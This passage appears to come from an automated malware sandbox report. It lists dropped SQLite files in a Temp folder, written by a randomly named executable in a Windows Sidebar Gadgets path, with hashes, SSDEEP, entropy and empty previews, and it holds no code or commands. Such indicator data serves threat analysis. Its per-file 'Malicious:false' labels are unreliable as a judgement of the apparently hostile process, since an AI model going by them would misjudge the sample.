                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QhgLIADXE1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Qv3Y04o77U

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QwkYz8GM6e

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Rnb2DmJTvA

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\S1M8GkhEP8

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SD5LLGHZu2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SJpNp8fNnj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SOWzLA7k47

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SSOC7iqJ3d

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SjSjhsSIAR

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\SxtOkrBN1s

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\T56J3iJG2c

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TBRCOFsvRa

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TG9SuOJMBc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TWTb4B7nh9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TXyGQuFWAu

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tb2x8pIsiH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tdrb15SvVB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Teu0BspRgc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TjKRvc6bxU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
